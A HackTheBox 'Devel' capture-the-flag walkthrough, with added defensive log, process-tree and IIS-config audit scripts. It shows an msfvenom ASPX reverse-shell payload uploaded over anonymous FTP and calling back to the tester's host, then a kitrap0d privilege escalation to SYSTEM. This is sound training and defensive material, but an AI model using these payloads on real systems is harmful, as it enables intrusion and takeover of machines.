
This is my second box on HackTheBox. There are probably a couple of different ways to exploit this, but I went with the FTP path as FTP is known to be vulnerable. Maybe later I will come back and try to exploit it over HTTP (if at all possible). We first exploit a vulnerability that gives us user-level access. As that user, we exploit a second, privilege escalation vulnerability that allows us to become SYSTEM.
Reconnaissance
We’ll start with checking which open ports are available to us.
$ nmap -A -T4 -p- 10.10.10.5
We get the following output.
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
We see that anonymous FTP login is allowed and that the HTTP service accepts the TRACE method. We also see the exact web server in use: Microsoft IIS 7.5.
Enumeration
Since anonymous logon is enabled on the FTP service, that is the low-hanging fruit to start with.
FTP
Let’s try logging in with the username anonymous (any e-mail-style string is accepted as the password).
$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:badmin): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
And we are in. Let’s verify whether we can both read files from and upload files to the server.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
Exploitation
FTP
Let’s generate a payload with msfvenom in ASPX format, since IIS will execute a .aspx page placed in its web root.
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f aspx > example.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2896 bytes
$ ls example.aspx
example.aspx
The file *example.aspx* is generated in the same folder.
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.6
LHOST => 10.10.14.6
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.6 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
Let’s run this.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.6:4444
The listener is running, so let’s switch back to the FTP session and upload the file to the server.
ftp> put example.aspx
local: example.aspx remote: example.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2933 bytes sent in 0.00 secs (1.2526 MB/s)
Let’s make the server execute the uploaded page by requesting http://10.10.10.5/example.aspx in a browser.
On the listener, we see that we got a session.
[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.5:49158) at 2021-06-24 08:51:04 +0100
meterpreter >
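The sequence just shown (an anonymous STOR of a server-side script into the FTP root, then an HTTP request for the same path that makes IIS compile and run it) leaves a clear trail in the server's own logs. The script below is an added example, not part of the original write-up: it parses IIS-style W3C logs (field order taken from the #Fields: header), flags completed anonymous uploads of script extensions, and raises the severity when a later HTTP request for that path returns 200. The log lines are constructed, and the example assumes the FTP root and the web root are the same directory, which the FTP listing of iisstart.htm suggests for this box.

```python
"""Correlate IIS FTP and HTTP W3C logs: anonymous upload of a server-side
script followed by an HTTP request that executes it. Added example with
constructed log lines; field names follow the IIS 7.5 W3C defaults."""
from dataclasses import dataclass
from datetime import datetime

# Extensions that IIS hands to a script engine when requested over HTTP.
SCRIPT_EXTENSIONS = (".aspx", ".asp", ".ashx", ".asmx")

# Constructed sample: FTP site log (W3C format, timestamps in UTC).
FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2021-06-24 07:49:10 10.10.14.6 anonymous 10.10.10.5 21 USER anonymous 331 0 0 a1b2c3 /
2021-06-24 07:49:12 10.10.14.6 anonymous 10.10.10.5 21 PASS *** 230 0 0 a1b2c3 /
2021-06-24 07:50:03 10.10.14.6 anonymous 10.10.10.5 21 STOR test.txt 226 0 0 a1b2c3 /test.txt
2021-06-24 07:50:40 10.10.14.6 anonymous 10.10.10.5 21 STOR example.aspx 226 0 0 a1b2c3 /example.aspx
"""

# Constructed sample: web site log for the same host (IIS writes '+' for spaces).
HTTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2021-06-24 07:48:30 10.10.10.5 GET /iisstart.htm - 80 - 10.10.14.6 Mozilla/5.0+(X11) 200 0 0 15
2021-06-24 07:51:02 10.10.10.5 GET /example.aspx - 80 - 10.10.14.6 Mozilla/5.0+(X11) 200 0 0 1312
"""


@dataclass(frozen=True)
class Finding:
    severity: str
    path: str
    detail: str


def parse_w3c(text: str) -> list[dict[str, str]]:
    """Turn W3C extended log text into dicts keyed by the #Fields: names."""
    fields: list[str] = []
    rows: list[dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            values = line.split()
            if len(values) == len(fields):  # skip malformed lines
                rows.append(dict(zip(fields, values)))
    return rows


def _timestamp(row: dict[str, str]) -> datetime:
    return datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")


def anonymous_script_uploads(ftp_rows: list[dict[str, str]]) -> dict[str, dict[str, str]]:
    """Completed (226) STOR commands by the anonymous account for script files."""
    uploads: dict[str, dict[str, str]] = {}
    for row in ftp_rows:
        if row["cs-method"] != "STOR" or row["sc-status"] != "226":
            continue
        if row["cs-username"].lower() != "anonymous":
            continue
        if row["x-fullpath"].lower().endswith(SCRIPT_EXTENSIONS):
            uploads[row["x-fullpath"]] = row
    return uploads


def correlate(ftp_log: str, http_log: str) -> list[Finding]:
    """Medium finding per anonymous script upload; high when it was later served."""
    uploads = anonymous_script_uploads(parse_w3c(ftp_log))
    findings = [
        Finding("medium", path, f"anonymous STOR of server-side script from {row['c-ip']}")
        for path, row in uploads.items()
    ]
    for req in parse_w3c(http_log):
        path = req["cs-uri-stem"]
        if path in uploads and req["sc-status"] == "200" and _timestamp(req) > _timestamp(uploads[path]):
            findings.append(Finding("high", path, f"uploaded script executed via HTTP GET from {req['c-ip']}"))
    return findings


if __name__ == "__main__":
    for finding in correlate(FTP_LOG, HTTP_LOG):
        print(f"[{finding.severity}] {finding.path}: {finding.detail}")
```

Note that test.txt does not produce a finding: a plain text upload is still worth logging, but it is the STOR of a file IIS will execute, and the request that follows it, that distinguishes this from a misconfigured but unexploited server.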
When we check the system details and user id, we see that we are running as the IIS application pool identity, not as SYSTEM.
meterpreter > sysinfo
Computer : DEVEL
OS : Windows 7 (6.1 Build 7600).
Architecture : x86
System Language : el_GR
Domain : HTB
Logged On Users : 0
Meterpreter : x86/windows
meterpreter > getuid
Server username: IIS APPPOOL\Web
Privilege Escalation
Now that we have a session, we can use post modules to try and escalate privileges. Searching for the suggester shows a single matching module.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
Let’s go ahead and use that module. The options require that we set the session number we want to interact with.
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
Once the module finishes, it lists several local exploits that may apply to this host.
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
We’ll go with ms10_015_kitrap0d, a 2010 Windows kernel vulnerability (MS10-015) that allows privilege escalation. In addition to the session number, we need to set LHOST to our own IP address on the tun0 interface.
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > options
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.176.95 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 2K SP4 - Windows 7 (x86)
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 2
session => 2
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.6
LHOST => 10.10.14.6
Everything is set now. Let’s run the module.
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.6:4444
[*] Launching notepad to host the exploit...
[+] Process 632 launched.
[*] Reflectively injecting the exploit DLL into 632...
[*] Injecting exploit into 632 ...
[*] Exploit injected. Injecting payload into 632...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 3 opened (10.10.14.6:4444 -> 10.10.10.5:49163) at 2021-06-24 09:02:56 +0100
We now have a new session, and this time getuid reports NT AUTHORITY\SYSTEM.
meterpreter > sysinfo
Computer : DEVEL
OS : Windows 7 (6.1 Build 7600).
Architecture : x86
System Language : el_GR
Domain : HTB
Logged On Users : 0
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
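From a defender's point of view, the privilege escalation above is visible in process-creation telemetry: the exploit module launched notepad.exe from the IIS worker process, and the elevated session then spawned cmd.exe as SYSTEM from that notepad.exe. The script below is an added example, not part of the original write-up, run over constructed process-creation events shaped like Sysmon Event ID 1 (image, user, parent image, parent pid). It applies two rules: a web worker (w3wp.exe) spawning anything other than the ASP.NET compiler processes, and a SYSTEM child whose parent was created under a non-SYSTEM account. The second rule needs the parent's own creation event, so the detector keeps a pid map; pid reuse across the window is ignored for brevity and is an assumption of this example.

```python
"""Process-tree rules for the behaviour seen in the write-up: w3wp.exe
spawning notepad.exe, then a SYSTEM cmd.exe under that notepad.exe.
Added example over constructed Sysmon-style events."""
from dataclasses import dataclass
from typing import Iterable

WEB_WORKER = "w3wp.exe"
# ASP.NET dynamic compilation legitimately runs these under w3wp.exe.
EXPECTED_WORKER_CHILDREN = {"csc.exe", "vbc.exe", "cvtres.exe"}
SYSTEM_ACCOUNT = r"nt authority\system"


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    image: str
    user: str
    parent_pid: int
    parent_image: str


@dataclass(frozen=True)
class Alert:
    rule: str
    pid: int
    detail: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: Iterable[ProcessEvent]) -> list[Alert]:
    """Apply both rules to events in chronological order (as a log delivers them)."""
    by_pid: dict[int, ProcessEvent] = {}  # assumption: no pid reuse inside the window
    alerts: list[Alert] = []
    for ev in events:
        parent = by_pid.get(ev.parent_pid)
        by_pid[ev.pid] = ev

        # Rule 1: the IIS worker should not spawn interactive or arbitrary programs.
        if _basename(ev.parent_image) == WEB_WORKER and _basename(ev.image) not in EXPECTED_WORKER_CHILDREN:
            alerts.append(Alert("web-worker-spawn", ev.pid, f"{ev.image} spawned by w3wp.exe as {ev.user}"))

        # Rule 2: a SYSTEM child of a process that was created as a lower-privileged
        # user means the parent's token was elevated after creation (kernel exploit,
        # token theft) rather than via a service start.
        if parent is not None and ev.user.lower() == SYSTEM_ACCOUNT and parent.user.lower() != SYSTEM_ACCOUNT:
            alerts.append(Alert("token-jump", ev.pid,
                                f"{ev.image} runs as SYSTEM but parent {parent.image} (pid {parent.pid}) was created as {parent.user}"))
    return alerts


# Constructed sample events modelled on the box (pids 632 and 1024 are from the write-up).
SAMPLE_EVENTS = [
    ProcessEvent(1488, r"C:\Windows\System32\inetsrv\w3wp.exe", r"IIS APPPOOL\Web", 900, r"C:\Windows\System32\svchost.exe"),
    ProcessEvent(2000, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe", r"IIS APPPOOL\Web", 1488, r"C:\Windows\System32\inetsrv\w3wp.exe"),
    ProcessEvent(632, r"C:\Windows\System32\notepad.exe", r"IIS APPPOOL\Web", 1488, r"C:\Windows\System32\inetsrv\w3wp.exe"),
    ProcessEvent(1024, r"C:\Windows\System32\cmd.exe", r"NT AUTHORITY\SYSTEM", 632, r"C:\Windows\System32\notepad.exe"),
]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert.rule}] pid {alert.pid}: {alert.detail}")
```

The csc.exe event is deliberately included: the first request for example.aspx makes ASP.NET compile it, so w3wp.exe launching the C# compiler is normal on this server and must not fire rule 1, while notepad.exe under the same parent must.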
Post Exploitation
Let’s drop down to the shell to interact with the Windows machine.
meterpreter > shell
Process 1024 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv> cd ../../..
cd ../../..
Let’s list the user profiles on the machine. We see Administrator and babis.
c:\>cd Users
cd Users
c:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8620-71F1
Directory of c:\Users
18/03/2017 02:16 �� <DIR> .
18/03/2017 02:16 �� <DIR> ..
18/03/2017 02:16 �� <DIR> Administrator
17/03/2017 05:17 �� <DIR> babis
18/03/2017 02:06 �� <DIR> Classic .NET AppPool
14/07/2009 10:20 �� <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 22.198.059.008 bytes free
User Flag
The user flag is normally located on the desktop of a standard user (C:\Documents and Settings\User\Desktop). In this case, we need to go to the desktop of the user “babis”. Once in that directory, we see the “user.txt.txt” file, whose contents we can read with the “type” command.
c:\Users\babis>cd Desktop
cd Desktop
c:\Users\babis\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8620-71F1
Directory of c:\Users\babis\Desktop
18/03/2017 02:14 �� <DIR> .
18/03/2017 02:14 �� <DIR> ..
18/03/2017 02:18 �� 32 user.txt.txt
1 File(s) 32 bytes
2 Dir(s) 22.197.534.720 bytes free
c:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecddXXXXXXXXXXXXXXf4cb3e8
Root flag
The root flag is normally located on the desktop of the Administrator account (C:\Documents and Settings\Administrator\Desktop). Once in that directory, we see the “root.txt” file, whose contents we can read with the “type” command.
c:\Users\babis\Desktop>cd ../../
cd ../../
c:\Users>cd Administrator
cd Administrator
c:\Users\Administrator>cd Desktop
cd Desktop
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8620-71F1
Directory of c:\Users\Administrator\Desktop
14/01/2021 12:42 �� <DIR> .
14/01/2021 12:42 �� <DIR> ..
18/03/2017 02:17 �� 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 22.190.256.128 bytes free
c:\Users\Administrator\Desktop>type root.txt
type root.txt
e621a0XXXXXXXXXXXXXXXbc72b4b
Defender’s Note
- FTP is an insecure protocol: credentials and data travel in clear text. Opt for more secure alternatives such as SFTP or FTPS.
- If you have to run FTP, disable anonymous login on the FTP server, and never give anonymous or wildcard users write access to a directory the web server will execute from.
- Patch systems in a timely manner; the kernel bug used here was fixed in 2010.
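The two configuration weaknesses that made the FTP path work (anonymous authentication on, a write rule for all users, and an FTP site sharing its root with the web site) can be audited offline from applicationHost.config. The script below is an added example, not part of the original write-up or of any IIS tooling; the element names (site/ftpServer/security/authentication/anonymousAuthentication, and system.ftpServer/security/authorization rules under a location element, with "*" meaning all users and "?" meaning anonymous) follow the IIS 7.5 FTP schema as I know it, and the configuration fragment is constructed to mirror this box, so verify both against your own config file.

```python
"""Audit an IIS applicationHost.config for the FTP weaknesses exploited in the
write-up. Added example with a constructed configuration fragment."""
import xml.etree.ElementTree as ET

# Constructed fragment modelled on the box: one site bound to both HTTP and FTP,
# anonymous FTP enabled, and a Read/Write rule for every user.
WEAK_CONFIG = """\
<configuration>
  <system.applicationHost>
    <sites>
      <site name="Default Web Site" id="1">
        <application path="/">
          <virtualDirectory path="/" physicalPath="C:\\inetpub\\wwwroot" />
        </application>
        <bindings>
          <binding protocol="http" bindingInformation="*:80:" />
          <binding protocol="ftp" bindingInformation="*:21:" />
        </bindings>
        <ftpServer>
          <security>
            <authentication>
              <anonymousAuthentication enabled="true" />
              <basicAuthentication enabled="false" />
            </authentication>
          </security>
        </ftpServer>
      </site>
    </sites>
  </system.applicationHost>
  <location path="Default Web Site">
    <system.ftpServer>
      <security>
        <authorization>
          <add accessType="Allow" users="*" permissions="Read, Write" />
        </authorization>
      </security>
    </system.ftpServer>
  </location>
</configuration>
"""


def _authorization_rules(root: ET.Element, site_name: str) -> list[tuple[str, ET.Element]]:
    """Authorization <add> rules whose <location path> is the site or a path under it."""
    rules = []
    for loc in root.iter("location"):
        path = loc.get("path", "")
        if path != site_name and not path.startswith(site_name + "/"):
            continue
        for authz in loc.iter("authorization"):
            rules.extend((path, rule) for rule in authz.findall("add"))
    return rules


def audit_ftp_config(xml_text: str) -> list[tuple[str, str, str]]:
    """Return (site, code, detail) findings for every site with an FTP binding."""
    root = ET.fromstring(xml_text)
    findings: list[tuple[str, str, str]] = []
    for site in root.iter("site"):
        name = site.get("name", "?")
        protocols = {b.get("protocol", "").lower() for b in site.iter("binding")}
        if "ftp" not in protocols:
            continue
        anon = next(site.iter("anonymousAuthentication"), None)
        anon_enabled = anon is not None and anon.get("enabled", "false").lower() == "true"
        if anon_enabled:
            findings.append((name, "anonymous-auth-enabled", "FTP anonymousAuthentication is enabled"))
        for path, rule in _authorization_rules(root, name):
            if rule.get("accessType", "").lower() != "allow":
                continue
            perms = {p.strip().lower() for p in rule.get("permissions", "").split(",")}
            if "write" not in perms:
                continue
            users = rule.get("users", "")
            if users == "*":
                findings.append((name, "everyone-write", f"rule at '{path}' grants Write to all users"))
            if anon_enabled and users in ("*", "?"):
                findings.append((name, "anonymous-write", f"rule at '{path}' lets anonymous users upload files"))
        if protocols & {"http", "https"}:
            findings.append((name, "ftp-shares-webroot",
                             "FTP and HTTP are bound to the same site, so FTP uploads land in the web root"))
    return findings


if __name__ == "__main__":
    for site, code, detail in audit_ftp_config(WEAK_CONFIG):
        print(f"{site}: {code}: {detail}")
```

Turning anonymous authentication off removes the two anonymous findings but not the wildcard write rule or the shared root; the fix the Defender's Note describes is all three: no anonymous access, write permission only for a named upload account, and an FTP root that IIS does not serve scripts from.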